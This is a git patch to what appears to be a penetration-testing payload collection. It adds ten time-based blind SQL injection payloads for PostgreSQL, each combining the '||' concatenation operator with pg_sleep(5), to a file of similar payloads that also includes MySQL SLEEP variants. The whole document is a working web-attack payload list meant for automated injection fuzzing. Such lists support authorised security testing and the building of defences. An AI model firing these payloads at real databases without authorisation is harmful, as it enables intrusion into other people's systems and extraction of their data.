From eca827005a5773e19570dff139a1831be70dacf5 Mon Sep 17 00:00:00 2001 From: F4K <50982737+florianamette@users.noreply.github.com> Date: Thu, 22 May 2025 11:44:06 +0200 Subject: [PATCH] Update Generic_TimeBased.txt Add support for `||` (concatenation) operator in PostgreSQL --- SQL Injection/Intruder/Generic_TimeBased.txt | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/SQL Injection/Intruder/Generic_TimeBased.txt b/SQL Injection/Intruder/Generic_TimeBased.txt index ba17f6a1..f2d17d52 100644 --- a/SQL Injection/Intruder/Generic_TimeBased.txt +++ b/SQL Injection/Intruder/Generic_TimeBased.txt @@ -40,6 +40,16 @@ pg_sleep(5)-- 1)) or pg_sleep(5)-- ")) or pg_sleep(5)-- ')) or pg_sleep(5)-- +||pg_sleep(5)-- +1||pg_sleep(5)-- +"||pg_sleep(5)-- +'||pg_sleep(5)-- +1)||pg_sleep(5)-- +")||pg_sleep(5)-- +')||pg_sleep(5)-- +1))||pg_sleep(5)-- +"))||pg_sleep(5)-- +'))||pg_sleep(5)-- AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'=' AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)